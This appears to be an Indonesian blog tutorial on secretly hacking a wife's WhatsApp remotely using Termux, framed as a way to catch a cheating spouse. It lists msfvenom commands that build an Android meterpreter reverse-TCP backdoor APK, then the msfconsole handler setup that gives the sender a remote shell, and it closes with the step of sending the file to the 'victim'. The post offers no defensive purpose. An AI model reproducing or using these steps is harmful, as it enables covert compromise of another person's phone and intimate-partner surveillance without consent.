Cara Menghack WA Istri Jarak Jauh Pake Termux

Cara Hack WA Istri Pake Termux Jarak Jauh - Smartphone merupakan salah satu alat yang paling penting bagi kehidupan di jaman sekarang. karena dengan kita menggunakan smartphone maka kita bisa berkomunikasi dengan orang walaupun dari jarak jauh. Smartphone yang paling populer dan paling banyak digunakan yaitu smartphone yang berbasis Android karena meliki fitur yang cukup lengkap. Jika kita bahas smartphone tentunya kita akan kepikiran ke aplikasinya, Sebenarnya banyak aplikasi android salah satunya adalah Whatsapp atau sering disebut dengan WA.

 WA atau Whatsapp merupakan sebuah aplikasi chatting dimana aplikasi ini memiliki banyak fitur seperti kirim pesan, foto, video, file, telepon, videocall, dan lain sebagainya. Aka tetapi di jaman sekarang terkadang banyak oknum oknum tidak bertanggung jawab menyelahgunkan aplikasi whatsapp misalnya untuk selingkuh, menipu orang, dan juga yang lainnya. Nah kalian tidak usah khawatir karena pada pertemuan kali ini saya akan mengulas bagaimana cara menghack WA istri dari jarak jauh dengan bantuan aplikasi termux. Untuk info lebih lanjutnya lagi silahkan kalian lihat dibawah ini.

Cara Hack WA Istri Pake Termux Jarak Jauh Tanpa Root

Bahan :
  • Download Termux Di Google Play 
  1. Cari alamat IP di aplikasi Termux
  2. Ubahlah alamat IP ini msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.166 LPORT=4444 R >hack.apk
    – LHOST dengan IP sendiri
  3. cari file backdoor di FILE > HOME > hack.apk
  4. Masuk kembali ke termux lalu pastekan IP dibawah ini
  5. msfconsole
    use exploit/multi/handler
    set payload android/meterpreter/reverse_tcp
    set lhost 192.168.43.166
    set lport 4444
    exploit
  6. Kirim file di atas ke korban
  7. Selesai
Cukup sekian dari saya mengenai ulasan cara hack wa pake termux jarak jauh no root semoga bisa membantu kalian dalam mengatasi perselingkuhan si hubungan kalian. Salam sapa
Cara Menghack WA Istri Jarak Jauh Pake Termux | tarkiman | 5